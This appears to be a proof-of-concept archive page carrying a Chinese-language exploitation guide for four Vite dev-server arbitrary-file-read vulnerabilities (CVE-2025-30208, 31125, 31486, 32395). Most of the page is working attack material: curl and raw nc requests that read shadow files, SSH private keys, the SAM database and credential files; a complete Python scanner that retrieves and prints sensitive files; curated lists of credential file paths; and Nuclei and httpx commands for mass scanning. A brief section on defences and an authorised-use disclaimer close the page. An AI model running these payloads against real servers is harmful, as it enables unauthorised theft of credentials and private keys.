Associated Vulnerability
Title:Vite bypasses server.fs.deny when using `?raw??` (CVE-2025-30208)Description:Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
Readme
# Vite漏洞利用指南 (CVE-2025-30208/31125/31486/32395)
本文档总结了Vite开发服务器中四个任意文件读取漏洞的利用方法,包括Linux和Windows系统的示例。**请注意:仅限在授权的安全测试环境中使用。**
## 基本原理
Vite开发服务器中的这四个漏洞都允许攻击者绕过`server.fs.deny`限制,读取服务器上的任意文件。每个漏洞使用不同的绕过技术,但基本原理相似。
## 影响条件
所有四个漏洞都需要满足以下条件才能被利用:
1. 目标使用了受影响版本的Vite开发服务器
2. 开发服务器被显式暴露到网络(使用`--host`或`server.host`配置选项)
3. 对于CVE-2025-32395,还需要服务器运行在Node或Bun(非Deno)环境
## 漏洞利用方法
### 1. CVE-2025-30208 (尾部分隔符绕过)
**影响版本**: < 6.2.3, < 6.1.2, < 6.0.12, < 5.4.15, < 4.5.10
**修复版本**: 6.2.3, 6.1.2, 6.0.12, 5.4.15, 4.5.10
**利用原理**: 通过在URL中添加`?raw??`或`?import&raw??`查询参数,绕过`@fs`路径限制。这是因为尾部分隔符(如`?`)在多个地方被移除,但在查询字符串正则表达式中未被考虑到。
**Linux系统利用示例**:
```bash
# 读取任意文件
curl "http://[目标IP]:5173/@fs/etc/passwd?raw??"
curl "http://[目标IP]:5173/@fs/etc/passwd?import&raw??"
curl "http://[目标IP]:5173/@fs/var/log/auth.log?raw??"
curl "http://[目标IP]:5173/@fs/home/[用户名]/.ssh/id_rsa?raw??"
# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/etc/passwd" # 应返回403错误
curl "http://[目标IP]:5173/@fs/etc/passwd?raw??" # 如果返回文件内容,则存在漏洞
```
**Windows系统利用示例**:
```bash
# 读取任意文件
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?raw??"
curl "http://[目标IP]:5173/@fs/C:/Windows/system32/drivers/etc/hosts?raw??"
curl "http://[目标IP]:5173/@fs/C:/Users/Administrator/Desktop/credentials.txt?raw??"
curl "http://[目标IP]:5173/@fs/C:/inetpub/wwwroot/web.config?raw??"
# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini" # 应返回403错误
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?raw??" # 如果返回文件内容,则存在漏洞
```
### 2. CVE-2025-31125 (特定导入方法绕过)
**影响版本**: 与CVE-2025-30208相同
**修复版本**: 与CVE-2025-30208相同
**利用原理**: 通过使用特定的导入方法,如`?inline&import`或`?raw?import`,绕过`server.fs.deny`配置。
**Linux系统利用示例**:
```bash
# 读取任意文件
curl "http://[目标IP]:5173/@fs/etc/passwd?inline&import"
curl "http://[目标IP]:5173/@fs/etc/passwd?raw?import"
curl "http://[目标IP]:5173/@fs/etc/shadow?inline&import"
curl "http://[目标IP]:5173/@fs/proc/self/environ?inline&import"
# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/etc/passwd" # 应返回403错误
curl "http://[目标IP]:5173/@fs/etc/passwd?inline&import" # 如果返回文件内容,则存在漏洞
```
**Windows系统利用示例**:
```bash
# 读取任意文件
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?inline&import"
curl "http://[目标IP]:5173/@fs/C:/Windows/system32/drivers/etc/hosts?inline&import"
curl "http://[目标IP]:5173/@fs/C:/Program Files/MySQL/MySQL Server 8.0/my.ini?inline&import"
curl "http://[目标IP]:5173/@fs/C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt?inline&import"
# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini" # 应返回403错误
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?inline&import" # 如果返回文件内容,则存在漏洞
```
### 3. CVE-2025-31486 (SVG和相对路径绕过)
**影响版本**: < 6.2.5, < 6.1.4, < 6.0.14, < 5.4.17, < 4.5.12
**修复版本**: 6.2.5, 6.1.4, 6.0.14, 5.4.17, 4.5.12
**利用原理**:
1. **SVG绕过**: 通过添加`?.svg?.wasm?init`或使用`sec-fetch-dest: script`头,绕过对`.svg`文件的限制检查
2. **相对路径绕过**: 利用ID规范化前的检查漏洞,使用相对路径(如`../../`)绕过限制
**Linux系统利用示例**:
```bash
# SVG绕过方法
curl "http://[目标IP]:5173/etc/passwd?.svg?.wasm?init"
curl -H "sec-fetch-dest: script" "http://[目标IP]:5173/etc/passwd?.svg"
curl "http://[目标IP]:5173/etc/nginx/nginx.conf?.svg?.wasm?init"
curl "http://[目标IP]:5173/var/www/html/config.php?.svg?.wasm?init"
# 相对路径绕过方法
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw"
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../etc/shadow?import&?raw"
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../var/log/auth.log?import&?raw"
# 验证漏洞是否存在
curl "http://[目标IP]:5173/etc/passwd" # 应返回404错误
curl "http://[目标IP]:5173/etc/passwd?.svg?.wasm?init" # 如果返回文件内容,则存在漏洞
```
**Windows系统利用示例**:
```bash
# SVG绕过方法
curl "http://[目标IP]:5173/C:/Windows/win.ini?.svg?.wasm?init"
curl -H "sec-fetch-dest: script" "http://[目标IP]:5173/C:/Windows/win.ini?.svg"
curl "http://[目标IP]:5173/C:/inetpub/wwwroot/web.config?.svg?.wasm?init"
curl "http://[目标IP]:5173/C:/Windows/Panther/Unattend.xml?.svg?.wasm?init"
# 相对路径绕过方法
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Windows/win.ini?import&?raw"
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Windows/system32/drivers/etc/hosts?import&?raw"
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Users/Administrator/Desktop/credentials.txt?import&?raw"
# 验证漏洞是否存在
curl "http://[目标IP]:5173/C:/Windows/win.ini" # 应返回404错误
curl "http://[目标IP]:5173/C:/Windows/win.ini?.svg?.wasm?init" # 如果返回文件内容,则存在漏洞
```
**注意**: SVG绕过仅在文件小于`build.assetsInlineLimit`(默认4kB)且使用Vite 6.0+时有效。
### 4. CVE-2025-32395 (无效请求目标绕过)
**影响版本**: < 6.2.6, < 6.1.5, < 6.0.15, < 5.4.18, < 4.5.13
**修复版本**: 6.2.6, 6.1.5, 6.0.15, 5.4.18, 4.5.13
**利用原理**: 利用HTTP 1.1规范中不允许在`request-target`中使用`#`字符的特性。在Node和Bun运行时中,这些请求不会被内部拒绝,`http.IncomingMessage.url`包含`#`,而Vite在检查`server.fs.deny`时假设`req.url`不会包含`#`。
**Linux系统利用示例**:
```bash
# 使用curl的--request-target选项
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/passwd" "http://[目标IP]:5173"
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/shadow" "http://[目标IP]:5173"
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../var/www/html/wp-config.php" "http://[目标IP]:5173"
# 或使用原始HTTP请求
echo -e "GET /@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/passwd HTTP/1.1\r\nHost: [目标IP]:5173\r\nConnection: close\r\n\r\n" | nc [目标IP] 5173
echo -e "GET /@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/shadow HTTP/1.1\r\nHost: [目标IP]:5173\r\nConnection: close\r\n\r\n" | nc [目标IP] 5173
# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/etc/passwd" # 应返回403错误
curl --request-target "/@fs/x/#/../../../../../etc/passwd" "http://[目标IP]:5173" # 如果返回文件内容,则存在漏洞
```
**Windows系统利用示例**:
```bash
# 使用curl的--request-target选项
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../C:/Windows/win.ini" "http://[目标IP]:5173"
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../C:/Windows/system32/drivers/etc/hosts" "http://[目标IP]:5173"
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../C:/inetpub/wwwroot/web.config" "http://[目标IP]:5173"
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../C:/Program Files/Microsoft SQL Server/MSSQL15.SQLEXPRESS/MSSQL/DATA/master.mdf" "http://[目标IP]:5173"
# 或使用原始HTTP请求
echo -e "GET /@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../C:/Windows/win.ini HTTP/1.1\r\nHost: [目标IP]:5173\r\nConnection: close\r\n\r\n" | nc [目标IP] 5173
echo -e "GET /@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt HTTP/1.1\r\nHost: [目标IP]:5173\r\nConnection: close\r\n\r\n" | nc [目标IP] 5173
# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini" # 应返回403错误
curl --request-target "/@fs/x/#/../../../../../C:/Windows/win.ini" "http://[目标IP]:5173" # 如果返回文件内容,则存在漏洞
```
**注意**: 此漏洞仅影响在Node或Bun(非Deno)环境中运行的Vite服务器。
## 综合利用脚本
以下Python脚本可以自动检测目标是否存在这四个漏洞中的任何一个,并包含更多测试路径:
```python
#!/usr/bin/env python3
#This script is made by "nkuty"
import requests
import argparse
import sys
import socket
import random
import string
import urllib.parse
from urllib3.exceptions import InsecureRequestWarning
# 禁用SSL警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def check_vite_vulnerabilities(target_url):
if not target_url.startswith('http' ):
target_url = f"http://{target_url}"
if target_url.endswith('/' ):
target_url = target_url[:-1]
# 解析URL获取主机和端口
parsed_url = urllib.parse.urlparse(target_url)
host = parsed_url.hostname
port = parsed_url.port
# 如果端口未指定,根据协议设置默认端口
if port is None:
port = 443 if parsed_url.scheme == 'https' else 80
print(f"[*] 测试目标: {target_url} (主机: {host}, 端口: {port} )")
# 扩展的Linux测试路径
linux_test_paths = [
"/etc/passwd",
"/etc/shadow",
"/etc/hosts",
"/etc/nginx/nginx.conf",
"/var/www/html/config.php",
"/var/www/html/wp-config.php",
"/home/admin/.ssh/id_rsa",
"/home/ubuntu/.ssh/id_rsa",
"/root/.ssh/id_rsa",
"/proc/self/environ",
"/var/log/auth.log",
"/etc/crontab",
"/etc/mysql/my.cnf",
"/var/www/html/.env",
"/opt/tomcat/conf/server.xml"
]
# 扩展的Windows测试路径
windows_test_paths = [
"C:/Windows/win.ini",
"C:/Windows/system32/drivers/etc/hosts",
"C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt",
"C:/inetpub/wwwroot/web.config",
"C:/Program Files/MySQL/MySQL Server 8.0/my.ini",
"C:/Users/Administrator/.ssh/id_rsa",
"C:/Windows/Panther/Unattend.xml",
"C:/xampp/php/php.ini",
"C:/Program Files/Microsoft SQL Server/MSSQL15.SQLEXPRESS/MSSQL/DATA/master.mdf",
"C:/Users/Administrator/Desktop/credentials.txt",
"C:/ProgramData/MySQL/MySQL Server 8.0/Data/ibdata1",
"C:/Windows/System32/config/SAM",
"C:/Windows/repair/SAM",
"C:/Windows/debug/NetSetup.log",
"C:/Windows/iis6.log"
]
# 所有测试路径
all_test_paths = linux_test_paths + windows_test_paths
vulnerabilities = {
"CVE-2025-30208": [
"/@fs{path}?raw??",
"/@fs{path}?import&raw??"
],
"CVE-2025-31125": [
"/@fs{path}?inline&import",
"/@fs{path}?raw?import"
],
"CVE-2025-31486": [
"{path}?.svg?.wasm?init",
"/@fs/x/x/x/vite-project/?/../../../../../{path}?import&?raw"
],
"CVE-2025-32395": [
"/@fs/x/#/../../../../../{path}"
]
}
# 首先测试基本路径是否可访问
try:
r = requests.get(f"{target_url}/@vite/client", timeout=5, verify=False)
if r.status_code != 200:
print(f"[-] 目标可能不是Vite服务器,未找到/@vite/client路径")
# 尝试其他可能的Vite标识
r = requests.get(f"{target_url}", timeout=5, verify=False)
if "vite" not in r.text.lower() and "dev server" not in r.text.lower():
print(f"[-] 目标页面内容中未找到Vite相关标识")
print(f"[*] 继续测试漏洞,忽略Vite标识检查...")
else:
print(f"[+] 确认目标是Vite服务器")
except Exception as e:
print(f"[-] 连接错误: {e}")
print(f"[*] 继续测试漏洞,忽略连接错误...")
# 生成随机文件名用于测试不存在的文件(避免误报)
random_filename = ''.join(random.choice(string.ascii_lowercase) for i in range(10))
random_test = f"/tmp/{random_filename}.txt"
# 测试CVE-2025-32395(需要自定义HTTP请求)
def test_cve_2025_32395(path):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((host, port))
# 根据协议构建请求
protocol = "HTTP/1.1"
request = f"GET /@fs/x/#/../../../../../{path} {protocol}\r\nHost: {host}:{port}\r\nConnection: close\r\n\r\n"
# 如果是HTTPS,需要包装SSL
if parsed_url.scheme == 'https':
import ssl
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT )
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
s = context.wrap_socket(s, server_hostname=host)
s.send(request.encode())
response = b""
while True:
chunk = s.recv(4096)
if not chunk:
break
response += chunk
s.close()
response_text = response.decode('utf-8', errors='ignore')
# 检查是否成功读取文件
if "HTTP/1.1 200" in response_text:
content = response_text.split('\r\n\r\n')[1] if '\r\n\r\n' in response_text else ""
if is_valid_file_content(path, content):
print(f"[+] 发现漏洞 CVE-2025-32395! 路径: {path}")
print(f"[+] 响应内容预览: {content[:100]}...")
return True
except Exception as e:
print(f"[-] 测试 CVE-2025-32395 路径 {path} 时出错: {e}")
return False
# 检查文件内容是否有效
def is_valid_file_content(path, content):
if not content:
return False
# 根据文件类型检查内容特征
if "passwd" in path and ("root:" in content or "nobody:" in content):
return True
elif "shadow" in path and ("root:" in content or "$" in content):
return True
elif "win.ini" in path and ("for 16-bit app support" in content or "[fonts]" in content):
return True
elif "hosts" in path and ("localhost" in content or "127.0.0.1" in content):
return True
elif ".ssh/id_rsa" in path and ("BEGIN" in content and "PRIVATE KEY" in content):
return True
elif "web.config" in path and ("<configuration" in content or "<connectionStrings" in content):
return True
elif ".php" in path and ("<?php" in content or "$" in content):
return True
elif ".env" in path and ("=" in content):
return True
elif ".xml" in path and ("<" in content and ">" in content):
return True
elif ".ini" in path and ("[" in content and "]" in content):
return True
elif ".log" in path and (len(content) > 10):
return True
elif ".txt" in path and (len(content) > 5):
return True
elif ".mdf" in path and (not content.isprintable()): # 二进制文件
return True
# 通用检查:内容不为空且不是错误消息
return len(content) > 10 and "error" not in content.lower() and "not found" not in content.lower()
# 测试所有漏洞和路径
found_vulnerabilities = []
# 首先测试CVE-2025-32395,因为它需要特殊处理
for path in all_test_paths:
if test_cve_2025_32395(path):
found_vulnerabilities.append(("CVE-2025-32395", path))
break
# 测试其他漏洞
for cve, templates in vulnerabilities.items():
if cve == "CVE-2025-32395":
continue # 已经测试过了
for path in all_test_paths:
for template in templates:
try:
url = f"{target_url}{template.format(path=path)}"
r = requests.get(url, timeout=5, verify=False)
if r.status_code == 200 and is_valid_file_content(path, r.text):
print(f"[+] 发现漏洞 {cve}! 路径: {path}, 模板: {template}")
print(f"[+] 响应内容预览: {r.text[:100]}...")
found_vulnerabilities.append((cve, path))
break
except Exception as e:
print(f"[-] 测试 {cve} 路径 {path} 模板 {template} 时出错: {e}")
if any(cve == v[0] for v in found_vulnerabilities):
break # 如果已经找到这个CVE的漏洞,就不再测试其他路径
# 测试随机文件名以验证是否存在误报
false_positives = []
for cve, templates in vulnerabilities.items():
if cve == "CVE-2025-32395":
continue
for template in templates:
try:
url = f"{target_url}{template.format(path=random_test)}"
r = requests.get(url, timeout=5, verify=False)
if r.status_code == 200 and len(r.text) > 10:
false_positives.append(cve)
break
except:
pass
# 报告结果
if found_vulnerabilities:
print("\n[+] 漏洞检测结果:")
for cve, path in found_vulnerabilities:
if cve in false_positives:
print(f" [-] {cve}: 可能存在误报,请手动验证")
else:
print(f" [+] {cve}: 确认存在漏洞,可访问 {path}")
return True
else:
print("[-] 未发现漏洞或目标已修复")
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Vite漏洞检测工具')
parser.add_argument('target', help='目标URL,例如: python3 vite_vulnerability_scanner.py http://example.com:5173' )
args = parser.parse_args()
check_vite_vulnerabilities(args.target)
```
>## 脚本使用方法
>
>1. **保存脚本**:
>
> - 将脚本内容复制到一个新文件中,例如命名为`vite_vulnerability_scanner.py`
> - 确保保存为UTF-8编码
>
>2. **安装依赖**:
>
> ```
> pip install requests argparse urllib3
> ```
>
>3. **赋予执行权限**(Linux/Mac系统):
>
> ```
> chmod +x vite_vulnerability_scanner.py
> ```
>
>4. **运行脚本**:
>
> ```
> # 基本用法
> python3 vite_vulnerability_scanner.py http://目标IP:5173
>
> # 或者如果您已赋予执行权限
> ./vite_vulnerability_scanner.py http://目标IP:5173
> ```
>
>5. **查看帮助**:
>
> ```
> python vite_vulnerability_scanner.py -h
> ```
## 常见敏感文件路径
### Linux系统
```
/etc/passwd # 用户账户信息
/etc/shadow # 密码哈希(需要权限)
/etc/hosts # 主机映射
/etc/nginx/nginx.conf # Nginx配置
/etc/apache2/apache2.conf # Apache配置
/var/www/html/config.php # PHP配置文件
/var/www/html/wp-config.php # WordPress配置
/var/www/html/.env # 环境变量文件
/home/[用户名]/.ssh/id_rsa # SSH私钥
/home/[用户名]/.bash_history # Bash历史命令
/proc/self/environ # 进程环境变量
/var/log/auth.log # 认证日志
/etc/crontab # 定时任务
/etc/mysql/my.cnf # MySQL配置
/opt/tomcat/conf/server.xml # Tomcat配置
/etc/redis/redis.conf # Redis配置
/var/lib/jenkins/secrets/ # Jenkins密钥
/var/www/html/application/config/database.php # CodeIgniter数据库配置
/var/www/html/sites/default/settings.php # Drupal配置
```
### Windows系统
```
C:/Windows/win.ini # Windows基本信息
C:/Windows/system32/drivers/etc/hosts # 主机映射
C:/Windows/Panther/Unattend.xml # 安装配置(可能包含凭据)
C:/Windows/System32/config/SAM # 用户账户数据库(需要权限)
C:/Windows/repair/SAM # SAM备份(可能存在)
C:/Windows/debug/NetSetup.log # 网络设置日志
C:/inetpub/wwwroot/web.config # IIS网站配置
C:/inetpub/logs/LogFiles/ # IIS日志
C:/Program Files/MySQL/MySQL Server 8.0/my.ini # MySQL配置
C:/xampp/php/php.ini # XAMPP PHP配置
C:/Users/[用户名]/.ssh/id_rsa # SSH私钥
C:/Users/[用户名]/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt # PowerShell历史
C:/Users/[用户名]/AppData/Roaming/Microsoft/Credentials/ # 存储的凭据
C:/Users/[用户名]/AppData/Local/Microsoft/Windows/INetCache/ # IE/Edge缓存
C:/Program Files/Microsoft SQL Server/MSSQL15.SQLEXPRESS/MSSQL/DATA/master.mdf # SQL Server数据文件
C:/ProgramData/MySQL/MySQL Server 8.0/Data/ibdata1 # MySQL数据文件
C:/Users/Administrator/Desktop/credentials.txt # 可能的凭据文件
C:/Windows/System32/inetsrv/config/applicationHost.config # IIS应用程序配置
C:/Windows/iis6.log # IIS日志
```
## 漏洞检测工具
除了上述Python脚本,还可以使用以下工具检测这些漏洞:
1. **Nuclei模板**:
```yaml
id: vite-file-read-vulnerabilities
info:
name: Vite Development Server - Arbitrary File Read
author: security-researcher
severity: high
description: Detects multiple arbitrary file read vulnerabilities in Vite development server
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-30208
- https://nvd.nist.gov/vuln/detail/CVE-2025-31486
- https://nvd.nist.gov/vuln/detail/CVE-2025-32395
requests:
- method: GET
path:
# Linux路径
- "{{BaseURL}}/@fs/etc/passwd?raw??"
- "{{BaseURL}}/@fs/etc/passwd?import&raw??"
- "{{BaseURL}}/@fs/etc/passwd?inline&import"
- "{{BaseURL}}/@fs/etc/passwd?raw?import"
- "{{BaseURL}}/etc/passwd?.svg?.wasm?init"
- "{{BaseURL}}/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw"
# Windows路径
- "{{BaseURL}}/@fs/C:/Windows/win.ini?raw??"
- "{{BaseURL}}/@fs/C:/Windows/win.ini?import&raw??"
- "{{BaseURL}}/@fs/C:/Windows/win.ini?inline&import"
- "{{BaseURL}}/@fs/C:/Windows/win.ini?raw?import"
- "{{BaseURL}}/C:/Windows/win.ini?.svg?.wasm?init"
- "{{BaseURL}}/@fs/x/x/x/vite-project/?/../../../../../C:/Windows/win.ini?import&?raw"
matchers-condition: or
matchers:
# Linux文件内容匹配
- type: regex
regex:
- "root:.*:0:0:"
part: body
# Windows文件内容匹配
- type: word
words:
- "for 16-bit app support"
- "[fonts]"
condition: or
part: body
# 通用匹配
- type: word
words:
- "export default"
condition: and
part: body
```
2. **使用httpx**:
```bash
# Linux路径测试
cat targets.txt | httpx -path "/@fs/etc/passwd?raw??" -mc 200 -match-regex "root:"
cat targets.txt | httpx -path "/@fs/etc/shadow?raw??" -mc 200 -match-regex "\$"
cat targets.txt | httpx -path "/etc/passwd?.svg?.wasm?init" -mc 200 -match-regex "root:"
# Windows路径测试
cat targets.txt | httpx -path "/@fs/C:/Windows/win.ini?raw??" -mc 200 -match-regex "for 16-bit app support"
cat targets.txt | httpx -path "/@fs/C:/Windows/system32/drivers/etc/hosts?raw??" -mc 200 -match-regex "localhost"
cat targets.txt | httpx -path "/C:/Windows/win.ini?.svg?.wasm?init" -mc 200 -match-regex "for 16-bit app support"
```
## 防御措施
1. **立即更新Vite**:
- 升级到6.2.6+、6.1.5+、6.0.15+、5.4.18+或4.5.13+
2. **限制网络暴露**:
- 不要在生产环境中使用Vite开发服务器
- 避免使用`--host`或`server.host`配置选项
- 如必须暴露,使用防火墙限制访问IP
3. **配置增强**:
- 使用`server.fs.strict: true`
- 明确配置`server.fs.allow`和`server.fs.deny`列表
- 考虑使用`server.fs.deny: ['**']`完全禁止文件系统访问
4. **运行时安全**:
- 考虑在Deno而非Node/Bun上运行Vite(根据CVE-2025-32395的发现)
- 使用最小权限原则运行Vite服务
**免责声明**:本文档仅供授权安全测试和教育目的使用。未经授权对系统进行测试是违法的。
File Snapshot
[4.0K] /data/pocs/0d2636b06d0fe0106dfa0d81b5253a3f31546762
├── [4.0K] png
│ └── [125K] 屏幕截图 .png
├── [ 25K] README.md
└── [9.8K] vite_vulnerability_scanner.py
1 directory, 3 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →